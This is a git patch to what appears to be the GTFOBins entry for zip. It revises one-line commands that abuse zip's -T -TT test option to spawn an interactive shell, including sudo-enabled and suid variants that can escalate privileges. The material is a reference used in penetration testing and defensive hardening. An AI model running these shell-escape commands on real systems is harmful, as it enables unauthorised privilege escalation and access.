From f740b410cc6e80bde44c2a66f266801814207dc5 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 19 Aug 2018 11:26:08 +0200 Subject: [PATCH] Simplify zip and add suid-limited --- _gtfobins/zip.md | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md index 9d3864f..13f9031 100644 --- a/_gtfobins/zip.md +++ b/_gtfobins/zip.md @@ -1,11 +1,15 @@ --- functions: execute-interactive: - - code: echo "/bin/sh" > /tmp/run.sh - chmod +x /tmp/run.sh - zip z.zip * -T -TT /tmp/run.sh + - code: | + zip /tmp/x.zip /etc/hosts -T -TT 'sh #' + rm /tmp/x.zip sudo-enabled: - - code: echo "/bin/sh" > /tmp/run.sh - chmod +x /tmp/run.sh - sudo zip z.zip * -T -TT /tmp/run.sh + - code: | + sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #' + sudo rm /tmp/x.zip + suid-limited: + - code: | + ./zip /tmp/x.zip /etc/hosts -T -TT 'sh #' + sudo rm /tmp/x.zip ---